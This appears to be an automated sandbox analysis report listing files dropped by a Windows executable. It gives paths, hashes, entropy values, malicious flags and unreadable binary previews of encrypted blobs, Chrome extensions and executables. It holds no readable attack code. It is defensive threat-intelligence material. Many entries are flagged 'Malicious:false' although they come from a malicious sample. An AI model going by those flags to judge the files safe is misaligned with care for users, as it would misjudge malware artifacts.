                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1045
                  Entropy (8bit):7.774028334519885
                  Encrypted:false
                  SSDEEP:24:yljM15Mci01hA4Ap491YYviGS5dojG4XS3zbD:ylAAWhA4RaYviQS3nD
                  MD5:B397DDCFC46A50B3DBB287CACC5F0FB0
                  SHA1:881FA732003ED16242CBAC13DABECF62509C2990
                  SHA-256:5D40EB46ADB76D59AE29739D42160B8DF18D734BDD8B5D675D58B571091153A0
                  SHA-512:B76FE735B0287CF667F30ECE035501A4EC5264F8831C1E48E76AD0B1C413DF5AAC78E91D70F4582048766A6D1B77A2388D55A1DC8774B62E1E522344E9A7D6B7
                  Malicious:false
                  Preview:RNWPR....o...6.g..y.U....\.{2.I.a.....&+6I.3Q*...w.5S....3B.[q..&..1K...d&.?.z.Ed...p.n3.?..i99..[...g.,.]+...|.D..I.(..<"..=.:....UK.......'...-.w0..Or..$.r...g...(%.o#.7.H.om.......a.".:g./.mK 8,..!.'..0..r..3..>9....1aeg.;.....E..0........%.w.~"/b>{.K.\...8...N.Z..p.^....>;..O.u....7.{.R.F.9B..........3.TJ.v.DN..".O.....r..n....U..S.]..s.].D-....q.}.....z..l3.w.,.K$}..T*......Tr....M....{.n..J..7.....lV%.`w;.u0............ .p]@e.%..0.#x..f*.t....^.q.v...."|53.....8..K..Qz;?ATH69,......o....3l.`...l/.......A.![.f2,..1.F."{s.V@Ab..A{..y.M.4.....<.M.Yo..C...Rfs.....2T.F.......~#.....O...eY...iQX.=.. X...i.q....4.g07*$...b.O.7......%.6.~h.8..|...l.....U...}..7.x.._F.,...-.<.?j.1.~.V.4.......8)7...Q..).....y..a..X.....;.....'.'G...._~Z....G=.L.h...Iw..I.s...3......3.m..g:..i..4..D{........76..p..6....#...v.5.../-4n.U.1.j...F....3e7....8..T...u..6.y...l(..`..9...q..V..ei:d....>.x...A...2..2...=.'..=}..Vi0fXrUHVihm5xsI9Icg243YMPJqd748Oc

                  C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):662017
                  Entropy (8bit):6.820279805113416
                  Encrypted:false
                  SSDEEP:12288:k+J3CjxGqhKeYTEU59Hmv3AxoPs/cgKY7tJF:kqyIqoeYJ/Gv3AxERCF
                  MD5:0BACC4C2F38C2B1013D54A84E03AE34F
                  SHA1:DAD69E4A0BAF28144A3EF647064616FA72BB4897
                  SHA-256:965A568702B190A72C796CBEF6B0197BA47923549BE375994AF9971B971E9FA4
                  SHA-512:AC9F4E58EB05BE287FA8D397106938FC7681961D70C5F39513F3EB2B2FF7C26AB9FA59F61A8F745C4CF3FE92866F020EFD89DA004D4F621D821ABF8AA3F31D9A
                  Malicious:false
                  Preview:RNWPR.'.<......H-%..}..:V]..o.>..~...\0....x.k...-...P3..y..z.W...i`......g.{....=..+.....`.....l.1.=_.=.Tq.cw_..].7.R. .\....'...M....\...2...t....$u"L.....Tji....)..Hr.".A.t.j...v..z6Y.Cs.n.r.....s.[a......Y._8.=...AT)...\Q.!....y.Z.4Z......=........|'..n...bc.F.N<...".f.E......}R ......?r.....f.d9..1..x.....72.E3.z-_..>..j..._.Jq..u..<.Y.....e..,...........5.-..E..Z.D.P._.@o..JKn....s,f.....i.B...T.e..;#..q%.f.....T.x...d.+p[...INm7.,...[j...MH$98F9.x..7hN..X......^~# #. ....R.I~c..1...uG......@.$....?( .5..Z...b..~....H...+,.G){8..W..7...M].G.`.7..T. SG...I.i^F....SR..j_G....@2.M.p..aXE0....t.....:....v..a.....J.y.k.....{.q..2{&xc..4..%..ORP..4.!...n.-.jQ....\R~.*/S~R....JA..8.....l.bl......07.;Q..L.W.QCX.O._-.t.rf...K.?.H....SwL..gM;%.....AuXD..y..*.8..T........{..s...C.......0..[9...lj@hTHP...!.T......H ...|.X.F....<z..K...3#......N..B.hx(.....$...C...`......}....h&...O~.r.C....r.P.S ].M....c.T.zW.....;....0P.8...o(>....]....G....j..4...a.

                  C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):193301
                  Entropy (8bit):7.870118251417856
                  Encrypted:false
                  SSDEEP:3072:b5UAlTNKK+EV26U1bUyd6QWWrYGAT5ZS8Ij0P1jvOfA3cWtnXM7XB6v7G1rElDb+:bxN/ObUgtWWrdoZ9j2ElnXM7XIwW8n
                  MD5:ADE3CA080A201A4158D55604A7DF982E
                  SHA1:F8318B7270F5A539B2004008C39BFCD7DA7B453F
                  SHA-256:30300340ED59BCEF9A03CEC8979F2307B121596888CA593B067E83EF968D85FE
                  SHA-512:4F32A351CEFE7033A57BC08B5C654793BC2B4498682AD1E1547084DD56D6C7DDE5C22254F1D9E66AB00E6B8831451902A1270D43DEA9D805B32E4D7C7C5B744E
                  Malicious:false
                  Preview:RNWPR....4R~.V....^Kr.....(..F{.%.j....o..-.X.=..5.Su.;%]..c.(.V....l.+.2.......o*IL.....J(...=....Su.!He...-J....~.T...r....&.>...5.....@g.....@..N.o..Z...@J.R..8.. }.=N..y.....[.`.=.7w.2.T.....7.q...VO.l."}.7.nb%..x........&...=..;.{L?O&R=...UP.....^d..&*.1S......C".v.F.i.S[.vv2.K..E:...G..,D...}.d.6......u...l.-j@.:...}8.%..:....Y..CsJ.)|....K..u......x. r.v.te.z..4....z6B8.c-.TGs.u,.n.2...(1..w... .3X%..6.{.....Nq....7...,.D._d*...z......P?.._X..%.f.VT.vf.v..0.T.?3j.5..c.&.Gt..,9Ih*.<.|x4;+........}..i%..q..d..6..*r..\2p.7i....E........whS.M......,.....t%. ,.1...\.../..E...Y....Z.<.;.%t2..H.oCm.8..p......X.{F..-2....^.... r..D..x..{.....q|.b.^.....f...B....1|.N.....[.sY%h..1...r<A........_....m..o."1..7.q..MSF{.?.Y?...b.L.~...!..*.'.G._~.....H..^].EwHl2d..*....dA..M....._"...;..s}.(2L..$.T&....H\.#.s".Z...*.. 0y.._.z%..F....u......-E.F.+.A=NT.8..z4....%.{.6<u.7.........*.QJr.../.E..=.W....t...s..<.".0....!=...,.....q.|......D.2.T..i~.L,...

                  C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):240209
                  Entropy (8bit):7.548777414489805
                  Encrypted:false
                  SSDEEP:6144:h1sFewsqQl8df8zr+AH4n7FfCSpFnqW7KfDv9nZ:PsFXQQudH4n7hCSfqW76
                  MD5:B0740B3F7040FE68F0497D8ED912656E
                  SHA1:71C1E0D4B21012EA72F45950B66751E0D86097BD
                  SHA-256:4651D5F0EE7B573FD2648BA5B7DDF14A8E69926292F8A64ABE9E39F17DC5DCB8
                  SHA-512:5AE72EFCAA530B6BE053025D291DFA5BBB7847A53F28E0223BAAAFB638DE0B5AD4A0A161DF794D8D8A86E6B2DCF942B5C9DD40FB9792B2193AFCDB0068517430
                  Malicious:false
                  Preview:RNWPRM.f..6P;..y'..Ql.....(..n.T..`G.h..}z...^..K....."@.....0Eq.g.....9..".....Z....h#.m.I.. \....s.@\ .lp..5.H..r$E.P~n...PV!..~2;j..4.+...GD.u...MA'.^.Zk.H.dad.}.5.I."..[(.n"<tu......O......>+*....!.../A..7..H.G....:h}....1.>#.R..%x....CH=.`.DF.....u..n.Dv...s....2.j..*...$.....>...N...i..;.....m.}.y.e(....mD%..4E-...S."y...N.."...{>...i..o..~....\........m...s.....Hw7{Ka.'p'.g8{....."C:...$n...b\..!....<.....>......Ug..lG.k./W.;.6.O.%).H.7....YP...]......Qsq.|...=u.\>......~S..v..*.D.......ex.I....A..R_".{z.....6.a..Z..M......%9..!Vr...f.g2...9...Y..~..M..KK".....H.9..v..q.,B.>a..>.....wv0....%..@.Z.QJ......i...$_.,wX..4m..Y..B.!..>......!2..>p..Q3....TH..Fy.+..fW(H..h..tgUU#ic\..Y].U.y..V....$ ..S....*....D.B..0..d..}.+.w.E.....G..:.5.....y+/~..G.5...@..I....D..r......k\vT...v1..!..K...k.;....3.@.b@.a!qC93......8.>...1..#....=....a.:~\<......,.>.;.oQJ[....dj._ V}.5.t....Tl0*g....MF..*......(.......X...@~(.......c...l...

                  C:\Users\user\AppData\Local\Temp\scoped_dir10952_1826612563\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 3952428803
                  Category:dropped
                  Size (bytes):248865
                  Entropy (8bit):7.985896417332284
                  Encrypted:false
                  SSDEEP:3072:Zl4oVHfwJrs6FHQAqzhae8G3KDq/xlvgeknA63wF3I0mIVvSyJ1ioN+VABUGDcax:7Gs6dQAqAe86kALlI0f15k2BVcaxlnfB
                  MD5:D0ACCB90B233C2B87993DB874EB4FFC4
                  SHA1:A089A3C109E6A904A1A95748E39A69D90666243C
                  SHA-256:6CA7057535A98B2CE5E858A152C84FD0134FEAAF99A5D8C53ACBA6393471603B
                  SHA-512:F9E302613E7F72819EE882448877A3E4903E032D515F5338FE5EEC0D16C3B200FFE826B81CF896C0C145CDBB437823861DACD743D44F99E3AC27752C6825BE8C
                  Malicious:false
                  Preview:Cr24.G......;/8R1c'yge.+..oA.m..Q{a......FG.0i.]....#..w`..H.s?k8c...=..Cn....n..:Cj+....d.TC.<.HhS`..m.B%..^.\C...\.rj.fcR.J..k..@.4.e..y.%".ms.)....Ad+'.'......b[;....s.9.-b.a...j|..../..$lwG'$.....?x..U..2.2c...\...t..<.W.H=.....`...43Z-e....:......*......'V8:..Xt.........b'.F......2.|.@.......+...I.#7.#....q.q....U..1...Z ^N#..=..9....(.1.o...z..GYU.(fE...M....iat10.@.z.H[@..QiW......O....>...k;r.<.....+...d.<.)9.....&U..@0....r.&....!.....c..Lw..diw.3.l.gM.....oO.?.L}..7^v.i..V.Y.v......t...............C.K.]....t'c..?..Y...EW....Vr..rD..E....h..90.....=2.$ h.......bR..y.?.C.........R.K. .4h..G..u...~F...iO.d.w.^Q..4..|F..>.3G_aU.'.j......A..6a......&[.?.6W.....1S..!.q.0P.L..........w.=.D......n........=..'..HM..}.....\........_C~...4i....!O@x.n=K.f.S..#..m...,..z...........&...<...u... ....U,....6.l..*.........o%T...W..F~(v.g..2.s#........>;..| .]...J...?..p$./B&i`v#.?:...C...U{.....s...MQ...$#6..ku..d..g.$.lM'..o?....d1XLb...%.ac

                  C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 3594724867
                  Category:dropped
                  Size (bytes):1332939
                  Entropy (8bit):7.991129311599401
                  Encrypted:true
                  SSDEEP:24576:Hga4e8+ZhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLG:HrZ5L371GFrbBKiyGAo0EzatGab
                  MD5:8011E7A2831D025B9507BF7A77B83C0A
                  SHA1:8178ECEC0DFFCB66E3DDF4C2F5D867419273230C
                  SHA-256:17B32AFFC456557A6EF1DE6523D1F6C3731217BF5F36496F1FE6293671C08DB1
                  SHA-512:A9FF204F1E9B091CE30C4F3BB3924B5B347D6E887D4F52ECCB1B1C901E06A89A245404D44836C3349B69ADA3EA0040808B1956EED32EADC963E5BD5853E57D26
                  Malicious:false
                  Preview:Cr24.&C.rfi......H.|V.Z..Q.n...Y...r.y..2 ..W..+.s\'... ....{e...,0|wg....6Zy.....5......@D..}...~.D.'......?Ca.MQ...q...mY\..s...TD..9B.7h.sgM..R....~>.,.U.Tb="....y..=xv.4..c...B:.. (_.]c|'E>@.[..eh'.W@_9.9....6..d*.....zi.aK..s...TG..N.....|..s).g.K.....`:.\3<k^..m._Nrhy.+yx.Y.C26...VJ..I1.]2....96....<.......0.B....X...v..?1.[..xt..2..\a.Gk{...C..aO.M.........f.*.#.-..........~...~...b.g....Sc>.R|D.[.6..|....G/j......Mb...Y*.&.S......E.|.W..f...\.K .,...{.2..oR...'..Kt*.8.1QV....Q`...,X.6.bh..!.......L..'.....9f../..C.\C...b~.$>.....n.k.....XM!......:....+.j:....../.K...q....f]d.;^d.........^nt.96.s.i.....b<.(.d.F..#.ZF.f%d..K7....]....D...sv.r.....8.Z[...x...L9...)..b.8i7.b..\.aI._.....ZH..#J.U.c..Y.._..m..F....J$S.M.d,.S./4.W%I...,g?.c.32.'........(v..,.:t.im.}.Iae.P........3 |.[.YX.K...5(........T.(.~..Bfjy....e.9..`W...d.......@..1.a.0.&.Dz.7a...^_.5.....z&.|...K:\!x..b.i...+...........l.\;[u,...F.p...0.X.U..e[9....

                  C:\Users\user\AppData\Local\Temp\tmpAAA2.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):810830
                  Entropy (8bit):7.956402533425356
                  Encrypted:false
                  SSDEEP:24576:7+VSMOZctE5eAHrJaBjBgS4BgSSxeVu/8UG4:7+VSZZqE5/rJ6gS+SxeV8JG4
                  MD5:4164A1D814C8FF34EF41A3496FCC7D65
                  SHA1:D31C8AF61DD6B93497AA311D442CDAD35F488B45
                  SHA-256:0F0B16785AC76345463C1984AE5A7C1C715F99327EDF506C4A16AAC461751918
                  SHA-512:81DB1FD5D064CDDDCD1CC362FBDDD8BD4B57E4F4CC6FA34DA79F6D977CB5FD927341F9F3247DCBE1679849451C950903A260D6413FD86366FF25A05A8C4C3B5B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:MZ........>..4.M.wE....'.B"q.>7}..J.B/...%dfd.A.i...v$E.|..r...y..0..X.bU..'.k.;.*da.G....;1..-I.'.....&M(...g.v..t[C.{v..GI.ubGOY..F.#.U.Pf.I.y.....37....}=.R.}.1.Nd..~......x...h...b..W.@vU..M..?Q.B(..wm.Q._e}6...q..#.i..-rD.e........\d.0ie... .Z`Mr.+..V...W.0...<..6...8..C)..4.f.I.~..(..P.\..].k.O.zM...XsC..... _..e......... .g.....6g.....~..W....N"U...'.N..^..,...t.}E&>B..h..V..y.~4AF..$E..'8[........I.f@|M......or.+j.g9..VVz.a...n.V(...w..F.q.l+.L0.....U9...m-c.0t.y1.'M0H..Mp..E..dE.2,7Q.TG.M....u........CZ[Y.a...fV.B.??........u.....GW...f8c8.;.....I..\.:.X.....[..E1'.2..dH..&...46..U'H..b.x.O........$.....7.1.zUP%.;o..M.m.gtN.p6.<`..E]K./H..T..v [.qb?..v0...y..8..'...=..3R...{.*p.N.c..n.A...C.2$/S.......t...v..Z..w......].R.:...:..H$...!.k....W..T.I.~........C........s..;......a..,.D&j.t.'W..Ai..:;x...~...u..0.0.I..`..I....&..h.\..i.7&]...Pp.~[.o.7..,....|4]+].I.....p.%8.0..ktBM...5.#|e.YY.'=..g...J1.PW.6-IN..j(.c..;.

                  C:\Users\user\AppData\Local\Temp\wct228B.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.99693753309651
                  Encrypted:true
                  SSDEEP:1536:fNgQOzRBB17zm/8IU8QLD45r6K4LZDv/4Ow7Vg4PvzEOS:fNh6D1mj3UX1Z71kVg4PdS
                  MD5:1E9CEFBEC655602AFBC11E98791E7561
                  SHA1:663F3139C8B76F77432F06216EB94FDE42B44540
                  SHA-256:8A337DEE70B1188471DD1E20D3A2925166B672744E535CC00ACB7E35DEAF62E6
                  SHA-512:0C3C5332A2540A788B1A5D4D40AA760B4EAC28F6F12D004657233B4D900CC07A6336D6C54F352F3E14A950013EE5B96360D4E13A321682782427A333BFA4FE89
                  Malicious:false
                  Preview:{"ram.j.9..R.....H..I".z..Ma....\?;......z......fPc...S,. .@%B.FNq.4g....&9{......~&.....Zb...m4......do.....'..........gv1O.~.]*t....2....0}..e..Fi.Ay.... ...V.@}+.........;.....da.l..k...EZ..aARsdz..l.ou.....I<?.....)'.....x...G..8Q.P.1.z..U{...~<.Y.?...?.SC..es...$-..-.[........_........_Zg...-/...0.]...6GF..........'%i.3...HK....[6..h..(..h.Fo.w<....\|..\...../.K..;,..47.A.x.....X.M..]X-!....[z'].....zJWC..VB.ncl..J.$.zf..f>..... ...E.....bN.{1...o.[..u..H...6..}1....Yz.6.)..0.=e...OAb..j..2...+?!...m.......p.6,U)H.M...9+.fT.ZI......cX..........).K.4'I.(..+..b..A.....<i-.....}...z..sZ.A.,(%..o]$,....m.YD.6........G........0t.Ij.Y....*2.......5....Wf..}^....\.`".NIQ.l..{..Uh.5.+.%.....b..T.....b:...>......(z.......o...Q..I"#.....G.:.....X.BL%..w..L.Th.......&Ni..o.`:Z..&Z9....B...EfWq.).5.k-..F.......J..G=n....we..8...[......ip......'...r2.M5..i.CX.:.Y%N.6D$..>%.Ld.r.;C..u(.z..`;..`x..HJ>.S[..Q..9...v.W.!..]i8.$.....d..

                  C:\Users\user\AppData\Local\Temp\wct4054.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997160521232647
                  Encrypted:true
                  SSDEEP:1536:fPU+aqE2BVwZhxBNeo910FqXxqCirg3qGUOc5EV4CXces409l5NE5:lbBihj9WFqXxq/gvk4lKf/W
                  MD5:1CC17E8DCD519E56F5F1CAED215E0A7A
                  SHA1:4AB25EB032B8D5C12204C57C5124FAE352B8E327
                  SHA-256:3CBA0FC90EC232E7923D53248AD153E869E60C5CA2C52E8EBD57829A644D928A
                  SHA-512:5A7D9633E2AFDE67676555A3FAEB9BFAB58DFA84E10C18BF74D50BEA78E89318AB5275E82D2CDD0F78DE0D273D9CA4A236D1ABA283D2F24CAB85D5361CCA8356
                  Malicious:false
                  Preview:{"ram..DM.CD(.2...%.s..z.GK....C2^......D..o.Lg:k..>.j.An....!..V`!...n.8W6#U.@N....jBf:x.)."...f..N.o.h.U.2.[[..n..Z.?.-......{....p.w.k..!....i.....e..k...F.@.....y........;'B+..h.c.S.P.^...St..../6H.....=.].n6....u8..!.A./.O...O.1.f....Kg.D4..17...............C\!lSmi.G$$.....^.s..,..=.v...jx.-A.0%.n#.-...!..7...de..$..._....sG..8p.i....C.H..,.z..jk...i.rKs..q;.B.yY.... .@.3.".f.....?.9B..y>..W.f...b.@.R...4..8{.9..X..u.MHe.z....N..2.].+..v..lz.3r;".....p{e....`g.8...".w.Ar]{........u.\..(E.m.J..{.X........ .....^'.7.oq..&.?....77%Z"}P.....X4.%X............#i.F\D...f....cM5.2.p.[9....?.t.P..R....I.e.#...q.3..#g FWV<N.61...........i........&..[O.....9c.d..g.H=v..*.......(z."f....d..yG........w..^o.30......IMA.D.+`...Q.}KxY.cF.....M.v..9...e....64!:...}m;...]....TE.x....s.[Y7.bf..3R...=[+.........Sn.L <b.+.I2.0..Z.CG3P".^.T.......$]...T.~...6...).DC *....q<....\...u.w.4..p..O.z#...9.=..lh.IH4.~...-.3..=.4. .1.h\*..,7S......

                  C:\Users\user\AppData\Local\Temp\wct7120.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):74526
                  Entropy (8bit):7.997551462787694
                  Encrypted:true
                  SSDEEP:1536:Ni4tuXZFejRyDzVzM4Xe0KVIPQ3vc4/0rcLl1aS+wlHAL++:NduZsADziOevIPQ3p8cLlb+wlHp+
                  MD5:1ADBB5BB17ED0030223FE9145DEF146F
                  SHA1:FE4B9527EB9F893E045DFE1A1EA66ED064102575
                  SHA-256:A5D3FF687D2207E79A279AFFE5D9D0926D3BAEFEFE4CE4E1A73B85D5DFA87D83
                  SHA-512:0D791B825E22668ACCE72906F25D11BFA9914BBB0A21E20C1877138E65D8C9D78D07FD68F36A91961A961098D4EF53F673AB81EC4AFF612EE35A96AEA356DCCF
                  Malicious:false
                  Preview:{"ram.~...]ax....F.K.G.n._..aT..0:.....c....|......3L.e..x>....H.W.._.nT?..../...:...#..?;..W..........@.......g........I.`"..PlX!n......t!.........$.'.%(...t....1Cqw.U~%...5U&.F.....21..i@.......5.mS..G.1.(.=9.I.....-.2...V..e..@tXrz.C,....:....I.d..p....0.....h.>X..X.o.g+.^.Z*...H.5.Lv...{..o....F..fd.A..k./.C..P..G.....W.E..&...f.....\C)......p..`..#..1.....8...E....!...B... Cr ..~O.(l!?y..wQ..5...Z..k..WuM.F]...!a......O.........1.x...V9].H....x.b}...$p.._.G..].b^....#...T...h.oi^^.}o.i..$b<#.GH.@..}E...M.y....^bj.k...Q...q....%.I.'t...e{&.j.;....j6.&.e.F...........@.3%.......]|....Y.+$H.k...b.....)D@=.....=f.T..Q..8.2.K'.......%.^..6?...8.1H..>.u......A";.Fc....T.9sc.~.zM.f......+.H].y'.gh...'..k.i........?...a.....'|..&....&...I..WC..\.a......$.u.......g..`..c:......l...R.'..q...p-w4..D.D....v.2.>0Y..J.F.....a.3.o..**.C.+......B......R...5Ky..6..d._..=...:...d{.P.....,.r.|..:'jm#yU.u...GN*..j....u..`.o.....s&.]...n.r3^..G.b..,.

                  C:\Users\user\AppData\Local\Temp\wctB366.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65188
                  Entropy (8bit):7.997108075295797
                  Encrypted:true
                  SSDEEP:768:uSteOvNQg8jChvFu7JjCg51J+GACVjw/FBVTEJ6Q0ayYJT72h2y9/PbqjCzc+z3a:PNh8jC7ejCgUUF1JHg2yZPWjCX3Czz
                  MD5:5631D631CAA6F1DF5375A9082B44D5F4
                  SHA1:688472609104D134D526AC25DAE4DAC3813E8A7C
                  SHA-256:FF256F96571CCDF3EFF0E0FD762A55BEA12566D5B7CE83999DBBCBBBD044024A
                  SHA-512:9C5A11925F408AEBC93F2BD91194F2A8A625338CBE11D536DFF6F19A52ECED5A9C2F563A56B84C8D5BE3981DBB2881DD2DC7C31F81C514756A69D6D4E6D77BDD
                  Malicious:false
                  Preview:{"ram....F?..m.>....\|A._..].,..E....-..6t"..-..6.l&...2.7.s......S..$d.R....y?..'.......haBsX.9...S..T..:=9..%..!..1?..ixv...."%..J..X.:bnO.3.3.T9.p}.Tl..Z.#..yq.-.;..ur. ..F...h.m. ..<....>....=R...0......B.......K:<...$.....6/...2.J4WxpWs.7.........P~.}.....Q....^..\.....C.?...\..\..w.....KN:..^N.J..P....E/q.......E.1..\...I..pv.[..N..18.X..9..K...9......c.e./ a...v".#~.k..."./r......3d.........G...,.pN.*.[..K.Bv.&H.2uk..&p....~J.h,..i...*...'.:!i.N......H.J.y...7....i.,....y]. .>E......x..`o...r.F~T...4..l#~."=.pd..Kz.G...H..yk..L.M..*...f3....ZZ.....X._g....y[.jXQ....qi.%..<.x.&c..3.W.b...D.S"@-.....Me.9....1..8<......O..Hc.J..l..+5f...e]..=...97...cx.......1..u....q...s.gm`Q.3Rp.D.8........m@..<.`52.Ya...5..@..b..Q.......!.......*.s.'Q.t...F!..`%..44.@.$.g....F.\.s4x.......@.CM..^B9h.~...@..MM.Z.4...[..y.."W...K......U.,.....V.d..}......}W"Y..<)GD/.?.#.S.)^=:w.....'V.j:.%S...R;....q.>.`....UO.m....*.....Q\.l.."B...v..

                  C:\Users\user\AppData\Local\Temp\wctDE6E.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS-DOS executable
                  Category:dropped
                  Size (bytes):42164934
                  Entropy (8bit):7.947667418144074
                  Encrypted:false
                  SSDEEP:786432:PwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59k:YQcWxDMPnN+dk65gGUjku4vNjLjk
                  MD5:7F34FD49325BFF7B58F8B5450434E3D2
                  SHA1:F076C8D39E0F8C8E0DE5DD840499EFADD25CD993
                  SHA-256:8D6F59BF4BBF7BCCA5897C563373CE4F444C7878A4CBBFA273872E36AFD2AF13
                  SHA-512:FDF601DD84FB569D2D4A0A17BB278E56CCF746330A11DA6B41BF9B96685B807871B78B4E20F60091BD5756C7E59AB4949ED76E3CDB07FA2880AAAA3221349D50
                  Malicious:true
                  Preview:MZ...gk*=..A.Fq..&e.*.......{......)*,...4@....OK..o.. \C2..<.O...1.R....~ ...N0s.....{.oY.*'i..L,.P6.9C}....vl`.....5..I&..;.g.B0........G.l.o(3.<c...-...u7b.0.^....w..&.[.A%....".m..-.ons)H...4.t..lxu1XU..Z....1......)..az..K[..I.......tj.$,.....e.IwJ.waI^G.F...`/}.EX..LV.Z.7p\...*......W.S...)%....k.p...$z7..h0x.>.O.O.0yiD$..]....0..<M.n..C..Z.4....M)@|..1...GI...6.......5. .~...LV<.6).C!...W...lnP.2......),.._.q.....|.I....0O.mInu....z.D.C.P......~.......<.@z#....^r..hk..ai..?.9.2 .....0...V.G%*....`.K.W..eV{...2t{w.u<!..^.);.~....2E..(l..!...q....UJv...>.k.^.....Jh..A...~...O &."..3.h.,.....JUz.......W.;Cn...c..*..<..........*.....}.O.=RK....).}..%..T.>.Q...@......].s..K../.3....?;./....|.k...wm.r.........).........>..g..!.F...4...J..4...7...*.....w*".....&V%%.L....]y.........uJ...4.2.l2.D;.UG..;T.k..N.)t-Y..~..w#s...a.4:.^.yGB.....Kz|X..f...uU...Y.....Wa.7/.S.N{.q...g.H.:.1.@.K.SG.U.....)_...O......`.X.+.kT..'.K.2b[t,..R.Lx..+...^

                  C:\Users\user\AppData\Local\Temp\wmsetup.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1031
                  Entropy (8bit):7.7690890648801
                  Encrypted:false
                  SSDEEP:24:tJN8fluKGNITVdnjHNxDzIixwu+Z3IzByYiVBC2M2WeYFaxKbdCYniY3zbD:n8x9HNxDkCwu+2gNDdi3nD
                  MD5:B04706BC4D16DA13AAE71D81BD068944
                  SHA1:0AD16643E4026D63AEBA92C154C6B3DA4E56638A
                  SHA-256:5855E25B7DEE06E44493C4FDD2CFE6E97895C77DD759674ACBBCF688561B9792
                  SHA-512:AD9BB841767CF7F49C70FBBA22F6FEA45AC2FBB2A9D48646997A9F119C58662C5CBBF1FD96DB2E0CFCD338E1B168B34C1A99F420AC4199283E4CF052E489257A
                  Malicious:false
                  Preview:..[*W...mD~}..].AJyU.....c..O.Ku.......a>..^...+.6.Q?M.r.Il..(.E;~..Bv..!b.K.l.nA..##....X..."....-.a....-...p..b.L.........z.x.GOg@...G.T.5p....A..$..bLNRq..._`...V.0.c}F..iYJ.]d.........(.Al.~..D......t..(.!...W..r..a@X+A.&?.@n%..].'%....1.jiw,....d.9(.&....L.....\0k.g..........%q.#...K=nn...nY!U..Q.,.Es...8.i.D....6{.3&_..p.....cc.]......-......*&...=......L....K.m.!.22.\..0..~.HZyG..]X$7..a#......&...,:u_O....Zc....N...Y5.>.{.K&.>!b......ph7......F)i....r.......uL.X..B.9/Y...ln.A....*..n...^C...M..b..zw./.x.yN......*.5v....F../...6W..].M.G.....V]].JkG.GN.../....t7..._..R..J.#.i.R.1.(p.w...$..D).k..z.K.K.n..YIk..[.N.>..}....J.b..Q.Z.....5..%L..mf.P.T.sB{.......s.j...\u,....X-.....P....M.]qA F.C..H..DD./...du.v..{:C.....0.....g..y.D..L..!......xZze...{....xX.9W.bXv.^..oL3g..'.1...m.0..nM.(.Y.S...&..JV....p..v. ...U.u.........5&'.../?.N.....K...]..@...K....r8...(....#%wuj.+.G$.U.8.6..u..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698

                  C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):810496
                  Entropy (8bit):7.764929744411165
                  Encrypted:false
                  SSDEEP:12288:9/DSCunCjrhA3fJs8ewDpc8b/JaBJjmyBgSxMlHkygSiioboEAIeVu/DjkV+hT6:kOyx5eAHrJaBjBgS4BgSSxeVu/8UG
                  MD5:3A11D47AD1A6093DDFE84E48E77554F3
                  SHA1:BDBCE8ED4A6B1347B0F1AD23184709E82CCD0249
